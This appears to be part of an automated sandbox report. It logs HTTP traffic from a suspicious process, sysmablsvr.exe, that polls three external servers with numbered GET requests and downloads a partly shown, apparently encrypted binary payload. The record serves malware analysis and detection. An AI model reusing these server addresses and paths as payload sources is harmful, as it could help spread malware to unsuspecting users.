                                            Sep 17, 2024 23:09:27.692382097 CEST | 166 | OUT | GET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:27.915556908 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:27 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Sep 17, 2024 23:09:29.942568064 CEST | 166 | OUT | GET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:30.163774967 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Sep 17, 2024 23:09:32.192881107 CEST | 166 | OUT | GET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:32.414632082 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:32 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            3 | 192.168.2.4 | 49738 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:09:35.464857101 CEST | 163 | OUT | GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.4 | 49741 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:09:39.241875887 CEST | 163 | OUT | GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.4 | 49743 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:09:42.938610077 CEST | 163 | OUT | GET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            6 | 192.168.2.4 | 49744 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:09:46.621805906 CEST | 163 | OUT | GET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            7 | 192.168.2.4 | 49745 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:09:50.351401091 CEST | 163 | OUT | GET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            8 | 192.168.2.4 | 49746 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:09:54.083096027 CEST | 163 | OUT | GET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            9 | 192.168.2.4 | 49748 | 91.202.233.141 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:09:58.798137903 CEST | 166 | OUT | GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:09:59.523145914 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:59 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:09:59.523197889 CEST | 1236 | IN | Data Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:09:59.523233891 CEST | 1236 | IN | Data Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:09:59.523266077 CEST | 1236 | IN | Data Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:09:59.523300886 CEST | 1236 | IN | Data Raw: 10 0d 0b b9 5f 9d 6d e6 92 57 24 32 d1 17 e9 b2 d9 ae 0d 71 a1 d0 f5 93 db 74 24 44 1d 9c e2 88 95 42 43 e3 6d 72 fc 78 0b 0c 45 d3 b3 36 15 f1 98 ab 5f 59 68 bb c4 59 ff aa da 7d a2 ad c0 0d 7b 82 2d 3b 08 0f 12 be 08 9a 06 81 47 b2 42 9b 80 69
                                            Data Ascii: _mW$2qt$DBCmrxE6_YhY}{-;GBiuMPyVE=hEN+kq?<'e>4bcb7Ki<=b"x5V$)VO$&<B0^MgOFzgQTfHO_T1*6vX
                                            Sep 17, 2024 23:09:59.523334026 CEST | 1236 | IN | Data Raw: 8a 04 bc 40 2f 0c e0 a9 d6 0a e2 f7 14 8f ae 57 56 3d 2a bf 40 a3 25 fe 65 17 b7 f6 2f da 29 64 e9 6d 89 dc fd a5 6c 7b b4 e5 b8 72 df 7e 9d 10 04 92 d4 19 f1 8d 30 01 70 8c 1d 49 81 05 99 27 00 4f 7d 7a 9d c1 12 6d da 6c 5e f7 bb 5a cd 3d cf 8c
                                            Data Ascii: @/WV=*@%e/)dml{r~0pI'O}zml^Z=ksq#t]ID4CX<Vq/P:_NwB)xJkGC~ua"5I5nKy+Y{?bCI%Xm01:._&u>}@_`T
                                            Sep 17, 2024 23:09:59.523413897 CEST | 1236 | IN | Data Raw: 30 57 86 af d6 c6 d3 34 95 3c 80 7e d4 8e 1c 90 01 dd 15 ca 71 10 9c 00 3b 53 0d 8c 64 86 20 42 75 94 c9 97 a4 ac 14 92 66 db cc e6 0b 41 93 bc 48 e3 00 cf 52 69 31 9b 26 f3 80 24 67 53 5d 3c 93 84 ba bb 51 1f 7e 2a d4 23 20 45 21 36 94 89 af 9c
                                            Data Ascii: 0W4<~q;Sd BufAHRi1&$gS]<Q~*# E!6:0x[EP-Xn\fv$4X,.YR:Ev%o)p k WkB6eCt@R`}2WP`YJM$3z?5\ JPql
                                            Sep 17, 2024 23:09:59.523448944 CEST | 1236 | IN | Data Raw: f9 22 9d 01 2b fd 11 5a 19 b7 74 3c 7d 58 9a d4 0d e0 14 a2 0d 47 fd c5 51 f2 b7 9a f7 48 65 ed 09 41 ba 81 e1 6c bb df 4d 7f 56 a2 00 f2 66 ff a8 c5 e0 fc 39 3a bc e6 d4 2e fd 2b c0 af c0 29 76 67 bd f2 ec 0e 7c 1d da eb 7b fd b7 62 3a b7 39 f1
                                            Data Ascii: "+Zt<}XGQHeAlMVf9:.+)vg|{b:9&&Qn1MW.Ob+am9W-@;fG@cP=YxuF HH;,TTu,zmDU'?lCk=Sbi@iK\eDw"wV
                                            Sep 17, 2024 23:09:59.523482084 CEST | 1236 | IN | Data Raw: 8c c8 46 fd 7c b3 b9 a1 94 a6 7b 4b c1 71 aa e7 a4 be 30 e5 5f 0e 05 16 bc 74 a8 2d 5c 2f 95 72 38 4e e1 76 31 86 be b0 b9 4d c9 83 64 b1 2d 19 3d 98 16 3b 2f 0b ec e9 18 da 39 a9 18 f7 a4 82 1f a4 33 02 ce 29 81 12 bd c3 f7 91 1b 26 27 d1 55 5c
                                            Data Ascii: F|{Kq0_t-\/r8Nv1Md-=;/93)&'U\]JvjS*g4!]ReebGCh+;`4TO{ZVj{726Vij&)q C*(*N|3q.C2&_JcQqGnwR
                                            Sep 17, 2024 23:09:59.523516893 CEST | 1236 | IN | Data Raw: 18 3e a6 e8 85 bc a6 54 db 4a 14 bc ac 5a 13 7e 50 e4 f7 f8 90 7e 8e c4 4e d6 4a 50 6c 97 a3 82 31 ec 59 be 4c 6f 38 62 b9 d7 4e 68 c4 e0 fb 81 94 96 eb 34 f8 ef 65 4d 72 0c e4 72 b0 61 ad 02 27 c5 b1 82 5c 94 03 fd 50 45 43 36 7b e0 0c a7 45 e4
                                            Data Ascii: >TJZ~P~NJPl1YLo8bNh4eMrra'\PEC6{E\?&SgIqzEfMCz1U74;B3Q&maoMkjyt'K1H(,TNK#/S|eQ2/f[C]A-Z&QQ>RuvF&0
                                            Sep 17, 2024 23:09:59.528557062 CEST | 449 | IN | Data Raw: 27 ce c4 b5 6b ea 96 54 3d fe 4f 4d 3d 18 9a a1 b4 15 32 01 38 10 4e b7 4b ed fb 49 c1 d8 b2 5d 08 75 1d 81 79 d8 fa b0 b2 98 90 35 9e 31 36 5f 4e 44 ef 33 04 01 c4 0a 90 70 41 47 fe 67 04 e6 85 b5 53 5f db c8 6e c0 79 b3 52 d8 7e 01 47 5e d2 91
                                            Data Ascii: 'kT=OM=28NKI]uy516_ND3pAGgS_nyR~G^{43e^W-qMw[~PA)LW!^LczVym_ZAVcYoZx%$[_j2\u\wch~;[E5}uiIj^A


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            10 | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:10:00.540867090 CEST | 166 | OUT | GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:01.236260891 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:01 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:10:01.236279011 CEST | 1236 | IN | Data Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:10:01.236289978 CEST | 1236 | IN | Data Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:10:01.236361027 CEST | 1236 | IN | Data Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:10:01.236372948 CEST | 1236 | IN | Data Raw: 10 0d 0b b9 5f 9d 6d e6 92 57 24 32 d1 17 e9 b2 d9 ae 0d 71 a1 d0 f5 93 db 74 24 44 1d 9c e2 88 95 42 43 e3 6d 72 fc 78 0b 0c 45 d3 b3 36 15 f1 98 ab 5f 59 68 bb c4 59 ff aa da 7d a2 ad c0 0d 7b 82 2d 3b 08 0f 12 be 08 9a 06 81 47 b2 42 9b 80 69
                                            Data Ascii: _mW$2qt$DBCmrxE6_YhY}{-;GBiuMPyVE=hEN+kq?<'e>4bcb7Ki<=b"x5V$)VO$&<B0^MgOFzgQTfHO_T1*6vX
                                            Sep 17, 2024 23:10:01.236382961 CEST | 1236 | IN | Data Raw: 8a 04 bc 40 2f 0c e0 a9 d6 0a e2 f7 14 8f ae 57 56 3d 2a bf 40 a3 25 fe 65 17 b7 f6 2f da 29 64 e9 6d 89 dc fd a5 6c 7b b4 e5 b8 72 df 7e 9d 10 04 92 d4 19 f1 8d 30 01 70 8c 1d 49 81 05 99 27 00 4f 7d 7a 9d c1 12 6d da 6c 5e f7 bb 5a cd 3d cf 8c
                                            Data Ascii: @/WV=*@%e/)dml{r~0pI'O}zml^Z=ksq#t]ID4CX<Vq/P:_NwB)xJkGC~ua"5I5nKy+Y{?bCI%Xm01:._&u>}@_`T
                                            Sep 17, 2024 23:10:01.236394882 CEST | 1236 | IN | Data Raw: 30 57 86 af d6 c6 d3 34 95 3c 80 7e d4 8e 1c 90 01 dd 15 ca 71 10 9c 00 3b 53 0d 8c 64 86 20 42 75 94 c9 97 a4 ac 14 92 66 db cc e6 0b 41 93 bc 48 e3 00 cf 52 69 31 9b 26 f3 80 24 67 53 5d 3c 93 84 ba bb 51 1f 7e 2a d4 23 20 45 21 36 94 89 af 9c
                                            Data Ascii: 0W4<~q;Sd BufAHRi1&$gS]<Q~*# E!6:0x[EP-Xn\fv$4X,.YR:Ev%o)p k WkB6eCt@R`}2WP`YJM$3z?5\ JPql
                                            Sep 17, 2024 23:10:01.236784935 CEST | 1236 | IN | Data Raw: f9 22 9d 01 2b fd 11 5a 19 b7 74 3c 7d 58 9a d4 0d e0 14 a2 0d 47 fd c5 51 f2 b7 9a f7 48 65 ed 09 41 ba 81 e1 6c bb df 4d 7f 56 a2 00 f2 66 ff a8 c5 e0 fc 39 3a bc e6 d4 2e fd 2b c0 af c0 29 76 67 bd f2 ec 0e 7c 1d da eb 7b fd b7 62 3a b7 39 f1
                                            Data Ascii: "+Zt<}XGQHeAlMVf9:.+)vg|{b:9&&Qn1MW.Ob+am9W-@;fG@cP=YxuF HH;,TTu,zmDU'?lCk=Sbi@iK\eDw"wV
